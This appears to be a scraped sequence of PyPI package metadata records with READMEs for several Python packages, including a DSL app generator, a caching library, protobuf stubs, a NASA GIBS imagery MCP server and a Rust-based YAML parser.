"Busy Sprint": seed_script: fixtures/busy_sprint.json for admin: description: "20 active tasks, 3 overdue, 2 in review" for member: description: "5 assigned tasks, 1 overdue" ``` ### Events and Streams | Construct | Purpose | |-----------|---------| | `publishes` | Event declarations on entities (lifecycle, field changes) | | `subscribe` | Event handlers and projections | | `stream` | HLESS (High-Level Event Semantics) with INTENT/FACT/OBSERVATION/DERIVATION records | --- ## The MCP Tooling Pipeline Dazzle is not just a runtime — it is also an AI-assisted development environment accessed through MCP (Model Context Protocol) tools. When you use Claude Code with a Dazzle project, you get access to **26 tools with 170+ operations** spanning every stage from natural-language spec to visual regression testing. ### 1. Spec to DSL Turn a plain-English idea into validated DSL. `bootstrap` is the entry point for "build me an app" requests; `spec_analyze` breaks a narrative into entities, lifecycles, personas, and business rules; `dsl` validates and inspects the result; `api_pack` wires in external APIs. | Tool | Operations | Purpose | |------|-----------|---------| | `bootstrap` | (single operation) | Entry point — scans for spec files, runs cognition pass, returns a mission briefing | | `spec_analyze` | discover_entities, identify_lifecycles, extract_personas, surface_rules, generate_questions, refine_spec | Analyze natural-language specs before DSL generation | | `dsl` | validate, lint, inspect_entity, inspect_surface, analyze, list_modules, get_spec, fidelity, list_fragments, export_frontend_spec | Parse, validate, inspect, and score DSL files | | `api_pack` | list, search, get, generate_dsl, env_vars, infrastructure | External API integration packs with infra manifests | ### 2. Test and Verify Generate stories, design tests, execute them at three tiers, and seed realistic demo data — all from the DSL. | Tool | Operations | Purpose | |------|-----------|---------| | `story` | propose, save, get, generate_tests, coverage | Generate and manage user stories; `get` with `view=wall` shows a founder-friendly board grouped by implementation status | | `test_design` | propose_persona, gaps, save, get, coverage_actions, runtime_gaps, save_runtime, auto_populate, improve_coverage | Persona-centric test design with autonomous gap-filling | | `dsl_test` | generate, run, run_all, coverage, list, create_sessions, diff_personas, verify_story | API tests — including `verify_story` (check story implementations) and `diff_personas` (compare route behavior across roles) | | `e2e_test` | check_infra, run, run_agent, coverage, list_flows, tier_guidance, run_viewport, list_viewport_specs, save_viewport_specs | Browser E2E with Playwright — viewport testing
text/markdown
DAZZLE Contributors
null
DAZZLE Contributors
null
MIT
dsl, code-generation, openapi, llm, domain-modeling, application-generator
[ "Development Status :: 3 - Alpha", "Intended Audience :: Developers", "License :: OSI Approved :: MIT License", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.12", "Topic :: Software Development :: Code Generators", "Topic :: Software Development :: Compilers", "Typing :: ...
[]
null
null
>=3.12
[]
[]
[]
[ "pydantic>=2.0", "typer>=0.9", "jinja2>=3.1", "pyyaml>=6.0", "markdown>=3.5", "psycopg[binary]>=3.2", "psycopg-pool>=3.2", "sqlalchemy>=2.0", "alembic>=1.14", "anthropic>=0.21.0; extra == \"llm\"", "openai>=1.0.0; extra == \"llm\"", "mcp>=1.0.0; extra == \"mcp\"", "pygls>=1.0.0; extra == \"l...
[]
[]
[]
[ "Homepage, https://github.com/manwithacat/dazzle", "Documentation, https://github.com/manwithacat/dazzle/blob/main/docs", "Repository, https://github.com/manwithacat/dazzle", "Issues, https://github.com/manwithacat/dazzle/issues", "Changelog, https://github.com/manwithacat/dazzle/blob/main/CHANGELOG.md" ]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:00:38.269064
dazzle_dsl-0.33.1.tar.gz
2,113,080
aa/6a/271a8e1737d6de2b36b59006e128d67ba7868af81ce15037a699bfa59a90/dazzle_dsl-0.33.1.tar.gz
source
sdist
null
false
73653ba57a03ef30af8fef4eee66291d
4c193b2d8aa6f23d2d36788e3e5ae929011ab5e864cbbdb1b14ffc7a81df645e
aa6a271a8e1737d6de2b36b59006e128d67ba7868af81ce15037a699bfa59a90
null
[ "LICENSE" ]
213
2.4
dd-cache
0.1.0
Backend-swappable caching layer for the dd-* ecosystem
# dd-cache Backend-swappable caching layer for the dd-* ecosystem. ## Install ```bash pip install -e . # core (memory + disk) pip install -e ".[redis]" # add Redis support pip install -e ".[dev]" # + pytest ``` ## Quick start ```python from dd_cache import InMemoryCache, DiskCache # In-process, TTL-aware with InMemoryCache() as cache: cache.set("key", {"data": 42}, ttl=60) value = cache.get("key") # Persistent SQLite with DiskCache(".cache/myapp.db") as cache: result = cache.get_or_set("expensive_key", lambda: run_expensive_query()) ``` ## Adapters | Class | Backend | Persistence | TTL | Extra deps | |-----------------|-----------|-------------|---------|------------| | `InMemoryCache` | dict | process | lazy | none | | `DiskCache` | SQLite | file | lazy | none | | `RedisCache` | Redis | server | native | `redis` | ## API ```python cache.get(key) # → Any | None cache.set(key, value, ttl=None) # ttl in seconds cache.delete(key) # → bool cache.exists(key) # → bool cache.clear() cache.stats() # → CacheStats cache.get_or_set(key, fn, ttl=None) ``` See `docs/DESIGN.md` for architecture details.
text/markdown
null
null
null
null
null
null
[]
[]
null
null
>=3.9
[]
[]
[]
[ "pydantic>=2.0.0", "redis>=4.0; extra == \"redis\"", "redis>=4.0; extra == \"all\"", "pytest>=7.0; extra == \"dev\"", "pytest-cov; extra == \"dev\"", "redis>=4.0; extra == \"dev\"" ]
[]
[]
[]
[]
twine/6.2.0 CPython/3.11.5
2026-02-19T22:00:35.266843
dd_cache-0.1.0.tar.gz
7,527
ae/c5/881ceea06b2efd2e421de4a7988e822d815bd826bde810e4968e1c13484d/dd_cache-0.1.0.tar.gz
source
sdist
null
false
105c15ae1817f0ddcdc99e61677965c5
91691330dee2b082ebe95fe68aa0d019c9a218d47d9e7c0fe02204956da77da2
aec5881ceea06b2efd2e421de4a7988e822d815bd826bde810e4968e1c13484d
MIT
[ "LICENSE" ]
226
2.4
keeps-learn-nexus-proto
0.11.0
Shared Protocol Buffer definitions for Nexus microservices
# Nexus Proto Shared Protocol Buffer definitions for Nexus microservices. ## Why "Nexus"? The name **Nexus** was chosen to represent the **central connection** between microservices. In many languages, "nexus" refers to a point of intersection or link, which is exactly what this project provides: an efficient hub for communication between distributed services built in different technologies. The idea is to create a convergence point that makes it easier to integrate systems, ensuring consistent and scalable communication, no matter the language or framework used. **Nexus** is the solution that connects and unites services in a simple and effective way. ## Features - **Centralized Protocol Definitions**: All communication contracts are defined in a shared repository of `.proto` files. - **Pre-Generated Python Stubs**: Python stubs (`*_pb2.py` and `*_pb2_grpc.py`) are automatically generated and included in the package, eliminating the need for consumers to generate them. - **Multi-Language Support**: Easily integrate microservices written in different programming languages (e.g., Python, Node.js, Java, etc.). - **Scalable Communication**: Easily extend the system as new microservices are added to the architecture. - **gRPC-powered**: Leveraging gRPC for high-performance communication with built-in support for multiple programming languages. - **Industry Standard**: Follows best practices from projects like `googleapis-common-protos`, ensuring consistency and reliability. ## Installation ### Node.js / npm ```bash npm install @keeps-learn/nexus-proto ``` 📦 **npm Package**: https://www.npmjs.com/package/@keeps-learn/nexus-proto ### Python / pip ```bash pip install keeps-learn-nexus-proto ``` 📦 **PyPI Package**: https://pypi.org/project/keeps-learn-nexus-proto/ ## Quick Start - Python ### Using Pre-Generated Stubs (Recommended) ```python # Import stubs directly - no compilation needed! from nexus_proto.generated.myaccount import users_pb2, users_pb2_grpc from nexus_proto.generated.konquest import mission_pb2, mission_pb2_grpc # Use message types user = users_pb2.User(id="123", name="John Doe") # Use service stubs with gRPC import grpc channel = grpc.aio.secure_channel('localhost:50051', grpc.ssl_channel_credentials()) stub = users_pb2_grpc.UserServiceStub(channel) ``` See [USAGE.md](./USAGE.md) for more detailed examples and options. ## Publishing 1. Update version in `package.json`, `setup.py`, and `pyproject.toml` 2. Commit: `git commit -m "Bump version to X.Y.Z"` 3. Tag: `git tag vX.Y.Z` 4. Push: `git push origin vX.Y.Z` GitHub Actions publishes automatically to both **npmjs.com** and **pypi.org** See [PUBLISH.md](./PUBLISH.md) for detailed publishing instructions.
text/markdown
null
Keeps <tecnologia@keeps.com.br>
null
null
MIT
grpc, protobuf, proto, microservices
[ "Development Status :: 4 - Beta", "Intended Audience :: Developers", "License :: OSI Approved :: MIT License", "Programming Language :: Python :: 3", "Topic :: Software Development :: Libraries", "Topic :: Communications" ]
[]
null
null
>=3.7
[]
[]
[]
[]
[]
[]
[]
[ "Homepage, https://github.com/Keeps-Learn/nexus-proto", "Repository, https://github.com/Keeps-Learn/nexus-proto.git", "Issues, https://github.com/Keeps-Learn/nexus-proto/issues" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T22:00:13.046835
keeps_learn_nexus_proto-0.11.0.tar.gz
26,041
48/03/a0d206cc733d380439940fb66eb41898ca78bd5ae4f987be5ac9e036e88c/keeps_learn_nexus_proto-0.11.0.tar.gz
source
sdist
null
false
6f2df98325d4ce468793d862432deaee
85456745a0df5b299731787a91f69b8628bb667844c4568c759867886e3889e5
4803a0d206cc733d380439940fb66eb41898ca78bd5ae4f987be5ac9e036e88c
null
[]
240
2.4
mcgibs
2026.2.19.2
FastMCP server for NASA Global Imagery Browse Services (GIBS)
# mcgibs NASA Earth science visualizations for LLMs. An [MCP](https://modelcontextprotocol.io/) server that connects language models to [NASA GIBS](https://www.earthdata.nasa.gov/engage/open-data-services-software/earthdata-developer-portal/gibs-api) (Global Imagery Browse Services) — 1000+ visualization layers covering satellite imagery, scientific data products, and derived Earth observations, updated daily. **Three pillars:** - **Discovery** — search layers by keyword, browse measurement categories, check date availability - **Visualization** — fetch imagery and data products by place name and date, compare dates side-by-side, composite multiple layers - **Interpretation** — natural-language colormap explanations, legend graphics, scientific context No API key required. All data is freely available from NASA. ## Quick Start ### From PyPI ```bash uvx mcgibs ``` ### Add to Claude Code ```bash claude mcp add mcgibs -- uvx mcgibs ``` ### Local development ```bash git clone https://git.supported.systems/mcp/mcgibs.git cd mcgibs uv sync --all-extras uv run mcgibs ``` Or add a local dev server to Claude Code: ```bash claude mcp add mcgibs-local -- uv run --directory /path/to/mcgibs mcgibs ``` ## Tools | Tool | Description | |------|-------------| | `search_gibs_layers` | Search 1000+ layers by keyword, measurement, period, or status | | `get_layer_info` | Full metadata for a layer — instrument, platform, resolution, dates | | `list_measurements` | All measurement categories with layer counts | | `check_layer_dates` | Available date range for a layer (capabilities + live DescribeDomains) | | `get_imagery` | Fetch a visualization by layer, date, and place name or bbox | | `compare_dates` | Side-by-side comparison of two dates for change detection | | `get_imagery_composite` | Overlay up to 5 layers into a single composite image | | `explain_layer_colormap` | Natural-language explanation of what colors represent | | `get_legend` | Pre-rendered legend graphic for a layer | | `query_point` | Get the exact data value at a coordinate by reverse-mapping the pixel color through the layer's colormap | | `get_time_series` | Fetch imagery across multiple dates for temporal analysis (up to 12 frames) | | `resolve_place` | Geocode a place name to coordinates and bounding box | | `build_tile_url` | Construct a direct WMTS tile URL for embedding | ## Resources | URI | Description | |-----|-------------| | `gibs://catalog` | Full layer catalog grouped by measurement category | | `gibs://layer/{layer_id}` | Individual layer metadata as JSON | | `gibs://colormap/{layer_id}` | Colormap explanation for a layer | | `gibs://dates/{layer_id}` | Available date range for a layer | | `gibs://projections` | Supported GIBS projections and endpoints | ## Prompts | Prompt | Parameters | Description | |--------|------------|-------------| | `earth_overview` | *(none)* | Introduction to GIBS with suggested explorations | | `investigate_event` | `event_type`, `location`, `date` | Guided workflow for investigating natural events | | `satellite_snapshot` | `place`, `date` | Quick satellite view of any location | | `climate_monitor` | `indicator`, `location`, `start_date`, `end_date` | Track climate changes over time | | `layer_deep_dive` | `layer_id`, `location`, `date` | Full scientific analysis of a single layer | | `multi_layer_story` | `topic`, `location`, `date` | Data journalism — composite layers to tell a story | | `polar_watch` | `pole`, `date`, `compare_date` | Arctic/Antarctic ice and snow monitoring | | `quantitative_snapshot` | `layer_id`, `locations`, `date` | Query exact data values at specific coordinates | | `seasonal_timelapse` | `layer_id`, `location`, `start_date`, `end_date` | Track visual changes across multiple dates | ## Conversational Examples These examples show what interacting with mcgibs looks like from any MCP client. Tool calls and responses are abbreviated for readability. All images below were fetched live from NASA GIBS using the mcgibs MCP tools. ### "What's happening in the Amazon right now?" *Try this with the `satellite_snapshot` prompt: `place="Amazon Rainforest"`* > **You:** Show me what the Amazon rainforest looks like from space today. The assistant resolves the location, fetches true color imagery, and searches for relevant science layers: ``` → resolve_place("Amazon Rainforest") {"display_name": "Amazon Rainforest", "lat": -3.46, "lon": -62.21, "bbox": {"west": -73.98, "south": -16.52, "east": -43.75, "north": 5.27}} → get_imagery("MODIS_Terra_CorrectedReflectance_TrueColor", "2025-08-01", place="Amazon Rainforest") ``` <img src="docs/images/amazon-true-color.jpg" width="600" alt="MODIS true color satellite view of the Amazon Basin showing river systems threading through dense forest canopy"> *MODIS Terra Corrected Reflectance — Amazon Basin, 2025-08-01* ``` → search_gibs_layers("vegetation") Found 12 layer(s) matching 'vegetation': MODIS_Terra_NDVI_8Day MODIS/Terra Vegetation Index (NDVI), 8-Day — from 2000-02-18 (8-Day) [has colormap] ... ``` > **Assistant:** Here's the Amazon from MODIS Terra — the river system is clearly visible, threading through dense canopy with sediment-laden water distinguishable from the dark forest. Some cloud cover is visible in the upper right. I also found vegetation index layers. Want me to overlay NDVI to show vegetation density, or check for fire/deforestation activity? --- ### Understanding what the colors mean *Try this with the `layer_deep_dive` prompt: `layer_id="AIRS_L3_Surface_Air_Temperature_Daily_Day"`* > **You:** What does the AIRS surface temperature layer actually show? The assistant fetches metadata, the colormap interpretation, and sample imagery: ``` → get_layer_info("AIRS_L3_Surface_Air_Temperature_Daily_Day") {"identifier": "AIRS_L3_Surface_Air_Temperature_Daily_Day", "title": "Surface Air Temperature (Day, Daily)", "instrument": "AIRS", "platform": "Aqua", "period": "Daily", "ongoing": true, "time": {"start": "2002-08-30", "end": null}} → explain_layer_colormap("AIRS_L3_Surface_Air_Temperature_Daily_Day") Surface Air Temperature (K): - light blue = below 200 K (-73.1 C) -- extreme cold - purple = ~230 K (-43.4 C) -- extreme cold - blue = ~260 K (-13.4 C) -- cold - orange = ~290 K (17.1 C) -- mild - magenta = above 320 K (46.9 C) -- extreme heat Color gradient runs from light blues (low values) through blues to magentas (high values). (242 color stops total, 5 key values shown) Transparent / no-data: No Data → get_imagery("AIRS_L3_Surface_Air_Temperature_Daily_Day", "2025-07-15", bbox=[-180, -90, 180, 90]) ``` <img src="docs/images/temperature-global.jpg" width="600" alt="Global surface air temperature map showing warm oranges and reds at the equator, cool blues and purples at the poles"> *AIRS Surface Air Temperature — global view, 2025-07-15. Black diagonal gaps are orbital swaths where the satellite hadn't passed yet.* ``` → get_legend("AIRS_L3_Surface_Air_Temperature_Daily_Day") ``` <img src="docs/images/temperature-legend.png" width="400" alt="Color legend bar for surface air temperature, ranging from below 200K to above 320K"> > **Assistant:** The AIRS instrument on NASA's Aqua satellite measures surface air temperature globally every day, and has been doing so since August 2002. The colormap runs from light blue (below -73°C, Antarctic interior) through purples and blues (cold/freezing) to orange (mild, ~17°C) and magenta (above 47°C, Saharan extremes). The diagonal black stripes are orbital gaps — the satellite covers the full globe but not all locations on the same day pass. Areas with no valid retrieval show as transparent. --- ### Tracking change over time *Try this with the `climate_monitor` prompt: `indicator="sea ice", location="Arctic", start_date="2025-03-01", end_date="2025-09-01"`* > **You:** How has Arctic sea ice changed between winter and summer this year? The assistant uses the `climate_monitor` workflow — search, verify dates, compare: ``` → search_gibs_layers("sea ice concentration") Found 8 layer(s) matching 'sea ice concentration': AMSRU2_Sea_Ice_Concentration_12km Sea Ice Concentration (12 km, AMSRU2, GCOM-W1) — from 2012-07-02 (Daily) [has colormap] ... → compare_dates("AMSRU2_Sea_Ice_Concentration_12km", "2025-03-01", "2025-09-01", bbox=[-180, 60, 180, 90]) ``` <img src="docs/images/arctic-ice-comparison.jpg" width="600" alt="Side-by-side comparison of Arctic sea ice: March 2025 showing near-complete coverage versus September 2025 showing dramatic retreat"> *AMSRU2 Sea Ice Concentration — Left: March 2025 (winter maximum) | Right: September 2025 (summer minimum). White/pink = high concentration, colorful edges = ice margin with varying concentration, black = open water or land.* > **Assistant:** The side-by-side view is striking. In March (left), the Arctic Ocean shows near-complete ice coverage — white and pale pink across the entire basin, with the ice edge extending well into the Bering Sea and Barents Sea. By September (right), the ice has retreated dramatically — the remaining pack ice is confined to a much smaller core around the pole, with extensive open water (black) visible along the entire Russian coastline and into the Canadian Archipelago. The colorful fringe along the ice edge shows the marginal ice zone where concentration drops from solid pack to scattered floes. --- ### Compositing layers to tell a story *Try this with the `investigate_event` prompt: `event_type="wildfire", location="Los Angeles", date="2025-01-08"`* > **You:** Can you show me how wildfire smoke from the 2025 LA fires affected air quality? The assistant searches for complementary layers, checks dates, and builds a composite: ``` → search_gibs_layers("aerosol") Found 8 layer(s) matching 'aerosol': MODIS_Terra_Aerosol_Optical_Depth MODIS/Terra Aerosol Optical Depth — from 2000-02-24 (Daily) [has colormap] ... → search_gibs_layers("fire thermal") Found 4 layer(s) matching 'fire thermal': MODIS_Fires_Terra MODIS/Terra Thermal Anomalies and Fire — from 2000-02-24 (Daily) [has colormap] ... → get_imagery_composite( ["MODIS_Terra_CorrectedReflectance_TrueColor", "MODIS_Terra_Aerosol_Optical_Depth"], "2025-01-08", place="Los Angeles") [composite image: true color with aerosol optical depth overlay] → explain_layer_colormap("MODIS_Terra_Aerosol_Optical_Depth") Aerosol Optical Depth: - yellow-green = ~0.15 (clean air) - orange = ~0.55 (moderate haze) - dark red = ~1.0 (thick smoke/dust) ... ``` > **Assistant:** The composite overlay tells the story clearly. Over the LA basin, the true color base shows a visible smoke plume extending southwest over the Pacific. The aerosol optical depth overlay confirms it — the orange-to-red values (0.5-1.0) directly over the fire zone indicate thick particulate loading, fading to yellow-green (0.15, clean air) further out over the ocean. The fire thermal anomaly layer pinpoints the active burn areas as bright red hotspots in the foothills. --- ### Querying exact values at a point *Try this with the `quantitative_snapshot` prompt: `layer_id="AIRS_L3_Surface_Air_Temperature_Daily_Day", locations="Tokyo, Sydney, Sahara Desert", date="2025-07-15"`* > **You:** What's the actual surface temperature in Tokyo, Sydney, and the Sahara right now? The assistant queries exact data values by reverse-mapping pixel colors through the layer's colormap: ``` → explain_layer_colormap("AIRS_L3_Surface_Air_Temperature_Daily_Day") Surface Air Temperature (K): - light blue = below 200 K (-73.1 C) - blue = ~260 K (-13.4 C) - orange = ~290 K (17.1 C) - magenta = above 320 K (46.9 C) (242 color stops total, 5 key values shown) → query_point("AIRS_L3_Surface_Air_Temperature_Daily_Day", "2025-07-15", lat=35.68, lon=139.69) {"value": 299.2, "units": "K", "converted": "26.1 C", "color": "orange", "quality": "exact", "description": "mild"} → query_point(..., lat=-33.87, lon=151.21) {"value": 282.8, "units": "K", "converted": "9.6 C", "color": "blue", "quality": "exact", "description": "near freezing"} → query_point(..., lat=25.0, lon=25.0) {"value": 304.8, "units": "K", "converted": "31.6 C", "color": "red", "quality": "exact", "description": "hot"} ``` > **Assistant:** Here are the AIRS-measured surface air temperatures for July 15, 2025: > > | Location | Temperature | Condition | > |----------|------------|-----------| > | Tokyo | 26.1°C (299.2 K) | Mild summer day | > | Sydney | 9.6°C (282.8 K) | Cool — it's winter in the Southern Hemisphere | > | Sahara | 31.6°C (304.8 K) | Hot, typical for desert in July | > > These come from the Atmospheric Infrared Sounder (AIRS) on NASA's Aqua satellite. The resolution is about 0.5°C — each of the 242 colormap entries covers a narrow value range, so the reverse-mapped pixel color gives an exact match to the original data. --- ### Watching a season unfold *Try this with the `seasonal_timelapse` prompt: `layer_id="MODIS_Terra_NDVI_8Day", location="Great Plains, USA", start_date="2025-03-01", end_date="2025-09-01"`* > **You:** Show me how vegetation changes across the US Great Plains from winter to summer. The assistant fetches a sequence of images at regular intervals: ``` → search_gibs_layers("NDVI") MODIS_Terra_NDVI_8Day MODIS/Terra Vegetation Index (NDVI), 8-Day — from 2000-02-18 (8-Day) [has colormap] → explain_layer_colormap("MODIS_Terra_NDVI_8Day") Vegetation Index (NDVI): - tan/brown = ~0.1 (bare soil, dormant vegetation) - yellow-green = ~0.3 (sparse vegetation) - green = ~0.6 (moderate vegetation) - dark green = ~0.9 (dense, healthy vegetation) → get_time_series("MODIS_Terra_NDVI_8Day", place="Great Plains USA", start_date="2025-03-01", end_date="2025-09-01", steps=6) [6 images: Mar 1, Apr 13, May 25, Jul 6, Aug 17, Sep 1] ``` <p align="center"> <img src="docs/images/ndvi-march.png" width="250" alt="Great Plains NDVI March — mostly brown, dormant vegetation"> <img src="docs/images/ndvi-june.png" width="250" alt="Great Plains NDVI June — vivid green, peak growing season"> <img src="docs/images/ndvi-september.png" width="250" alt="Great Plains NDVI September — mixed green and brown, harvest underway"> </p> <p align="center"><em>Great Plains vegetation: March (dormant) → June (peak growth) → September (harvest)</em></p> > **Assistant:** The six frames tell a clear story of the growing season: > > 1. **March** — The Plains are mostly tan/brown (NDVI ~0.1), winter dormancy. Only southern Texas shows hints of green. > 2. **April** — A flush of yellow-green creeps north from Oklahoma as winter wheat greens up. > 3. **May** — The green wave accelerates — Kansas and Nebraska shift to solid green (NDVI ~0.5) as corn and soybean planting peaks. > 4. **July** — Peak vegetation. The entire region is dark green (NDVI 0.7-0.9). Crop canopy is fully closed. > 5. **August** — Still green but beginning to yellow at the margins. Early harvest in southern counties. > 6. **September** — Harvest underway. The palette shifts back toward yellow-green and tan as crops are cut. --- ### Polar ice in proper projection *Try this with the `polar_watch` prompt: `pole="arctic", date="2025-09-01"`* > **You:** Show me the current state of Arctic sea ice — and use the right map projection. The `polar_watch` prompt guides the assistant to use polar stereographic projection: ``` → get_imagery("AMSRU2_Sea_Ice_Concentration_12km", "2025-03-01", bbox=[-180, 60, 180, 90], projection="3413") [image: Arctic sea ice in polar stereographic — circular view centered on the pole] → explain_layer_colormap("AMSRU2_Sea_Ice_Concentration_12km") Sea Ice Concentration (%): - dark blue = ~15% (scattered floes) - cyan = ~40% - light grey = ~70% - white = ~100% (solid pack ice) → build_tile_url("AMSRU2_Sea_Ice_Concentration_12km", "2025-03-01", zoom=2, row=0, col=0, projection="3413") https://gibs.earthdata.nasa.gov/wmts/epsg3413/best/AMSRU2_Sea_Ice_Concentration_12km/... ``` <p align="center"> <img src="docs/images/arctic-polar-stereo.png" width="500" alt="Arctic sea ice concentration in polar stereographic projection — March peak extent showing ice covering most of the Arctic basin"> </p> <p align="center"><em>Arctic sea ice, March 2025 — EPSG:3413 polar stereographic projection</em></p> > **Assistant:** With polar stereographic projection (EPSG:3413), the Arctic is shown as a circular view centered on the North Pole — no more equirectangular distortion. The March maximum extent fills the basin: solid pack ice (white/pink, 90-100%) dominates the center, with concentration gradients at the margins where ice meets open water. The colorful fringe marks coastlines and the marginal ice zone. The embeddable WMTS tile URL is ready for dashboards or reports. ## Projections | EPSG | Description | Use case | |------|-------------|----------| | 4326 | Geographic (WGS84) | Default — global coverage, most layers | | 3857 | Web Mercator | Web map tiles, Leaflet/Mapbox integration | | 3413 | Arctic Polar Stereographic | Arctic-focused imagery | | 3031 | Antarctic Polar Stereographic | Antarctic-focused imagery | ## Development ```bash uv sync --all-extras # Lint uv run ruff check src/ tests/ # Tests uv run pytest # Build uv build ``` ## Architecture ``` src/mcgibs/ server.py MCP server — tools, resources, prompts, middleware client.py GIBS HTTP client — WMS, WMTS, colormaps, geocoding capabilities.py WMTS GetCapabilities parser and layer search colormaps.py Colormap XML parser and natural-language interpreter models.py Pydantic models — Layer, BBox, GeoResult, ColormapEntry constants.py API endpoints, projections, tile matrix definitions geo.py Bounding box math and geocoding helpers ``` ## License [MIT](LICENSE) ## Links - [NASA GIBS](https://www.earthdata.nasa.gov/engage/open-data-services-software/earthdata-developer-portal/gibs-api) - [GIBS API Documentation](https://nasa-gibs.github.io/gibs-api-docs/) - [Worldview](https://worldview.earthdata.nasa.gov/) — NASA's browser-based GIBS viewer - [FastMCP](https://gofastmcp.com/) — the MCP framework powering this server - [Source](https://git.supported.systems/mcp/mcgibs)
text/markdown
null
Ryan Malloy <ryan@supported.systems>
null
null
MIT
earth-science, gibs, imagery, mcp, nasa, satellite
[ "Development Status :: 4 - Beta", "Intended Audience :: Developers", "Intended Audience :: Science/Research", "License :: OSI Approved :: MIT License", "Programming Language :: Python :: 3.12", "Programming Language :: Python :: 3.13", "Programming Language :: Python :: 3.14", "Topic :: Scientific/Eng...
[]
null
null
>=3.12
[]
[]
[]
[ "defusedxml>=0.7.1", "fastmcp>=3.0.0", "pillow>=12.0.0", "pytest-asyncio>=1.0.0; extra == \"dev\"", "pytest>=8.0.0; extra == \"dev\"", "respx>=0.22.0; extra == \"dev\"", "ruff>=0.9.0; extra == \"dev\"" ]
[]
[]
[]
[ "Homepage, https://git.supported.systems/mcp/mcgibs", "Documentation, https://nasa-gibs.github.io/gibs-api-docs/", "Bug Tracker, https://git.supported.systems/mcp/mcgibs/issues" ]
uv/0.9.26 {"installer":{"name":"uv","version":"0.9.26","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"EndeavourOS","version":null,"id":null,"libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":null}
2026-02-19T22:00:03.194734
mcgibs-2026.2.19.2.tar.gz
2,524,322
5a/1c/62d4b337c556365dfcb8ae07748823864f609fc119163a70a3dd92eba625/mcgibs-2026.2.19.2.tar.gz
source
sdist
null
false
14a58505c5238a122dc617cc574adeb7
47a2d4ef0a3a53b25b078be37e419b76a3a3a633a4ed4373707493708f18d668
5a1c62d4b337c556365dfcb8ae07748823864f609fc119163a70a3dd92eba625
null
[ "LICENSE" ]
186
2.4
yaml-rs
0.0.12
A High-Performance YAML Parser for Python written in Rust
<div align="center"> # yaml-rs *A High-Performance YAML parser for Python written in Rust* [![PyPI License](https://img.shields.io/pypi/l/yaml_rs.svg?style=flat-square)](https://pypi.org/project/yaml_rs/) [![Python version](https://img.shields.io/pypi/pyversions/yaml_rs.svg?style=flat-square)](https://pypi.org/project/yaml_rs/) [![Implementation](https://img.shields.io/pypi/implementation/yaml_rs.svg?style=flat-square)](https://pypi.org/project/yaml_rs/) [![Monthly downloads](https://img.shields.io/pypi/dm/yaml_rs.svg?style=)](https://pypi.org/project/yaml_rs/) [![Github Repository size](https://img.shields.io/github/repo-size/lava-sh/yaml-rs?style=flat-square)](https://github.com/lava-sh/yaml-rs) </div> ## Features * The fastest YAML parser in Python (see [benchmarks](https://github.com/lava-sh/yaml-rs/tree/main/benchmark)) * Full YAML v1.2 spec support ## Installation ```bash # Using pip pip install yaml-rs # Using uv uv pip install yaml-rs ``` ## Examples ```python from pprint import pprint import yaml_rs yaml = """\ app: name: service environment: production debug: false version: 1.3.5 log: level: INFO file: /var/log/service/app.log rotation: enabled: true max_size_mb: 50 database: engine: mariadb host: localhost port: 3306 username: app_user password: super_secret_password pool_size: 10 timeout_seconds: 30 metadata: author: "John Doe" created_at: 2024-01-15T12:00:00Z updated_at: 2025-11-09T10:30:00Z """ pprint(yaml_rs.loads(yaml)) ``` ## Why not [pyyaml](https://pypi.org/project/PyYAML), [ruamel.yaml](https://pypi.org/project/ruamel.yaml), [strictyaml](https://pypi.org/project/strictyaml)? `PyYAML` and `ruamel.yaml` сan't parse example 2.23, 2.24, 2.27, 2.28, etc. from [YAML spec](https://yaml.org/spec/1.2.2) and also do not pass all tests from [yaml-test-suite](https://github.com/yaml/yaml-test-suite). `strictyaml` use `ruamel.yaml` as parser so all the bugs are repeated too. ```python import yaml as pyyaml example_2_23 = """\ --- not-date: !!str 2002-04-28 picture: !!binary | R0lGODlhDAAMAIQAAP//9/X 17unp5WZmZgAAAOfn515eXv Pz7Y6OjuDg4J+fn5OTk6enp 56enmleECcgggoBADs= application specific tag: !something | The semantics of the tag above may be different for different documents. """ print(pyyaml.safe_load(example_2_23)) # yaml.constructor.ConstructorError ``` ```python import yaml as pyyaml from ruamel.yaml import YAML yaml_safe = YAML(typ="safe") yaml = "! 15" # must be str pyyaml_load = pyyaml.safe_load(yaml) ruamel_yaml_load = yaml_safe.load(yaml) print(pyyaml_load) # 15 print(type(pyyaml_load)) # <class 'int'> print(ruamel_yaml_load) # 15 print(type(ruamel_yaml_load)) # <class 'int'> ```
text/markdown; charset=UTF-8; variant=GFM
null
chirizxc <chirizxc@proton.me>
null
chirizxc <chirizxc@proton.me>
null
null
[ "Typing :: Typed", "Programming Language :: Rust", "Programming Language :: Python", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Programming Language :: Python :: 3.13", "Program...
[]
null
null
>=3.10
[]
[]
[]
[]
[]
[]
[]
[ "Bug Tracker, https://github.com/lava-sh/yaml-rs/issues", "Homepage, https://github.com/lava-sh/yaml-rs", "Source, https://github.com/lava-sh/yaml-rs" ]
maturin/1.12.3
2026-02-19T21:59:40.131300
yaml_rs-0.0.12-cp314-cp314t-win32.whl
438,648
8b/ab/29e60510c07224505d02ff07e8166870ac366e6635e225f86afc66ef665a/yaml_rs-0.0.12-cp314-cp314t-win32.whl
cp314
bdist_wheel
null
false
b1241fa454d8b93b333a8ba54f7f9be2
797a57e2064a179b4897527661af526756b9d6a52fbb2307de58edd2efd6b262
8bab29e60510c07224505d02ff07e8166870ac366e6635e225f86afc66ef665a
null
[]
7,136
2.4
eradication-stan
0.2.0
A python wrapper for cmdStan
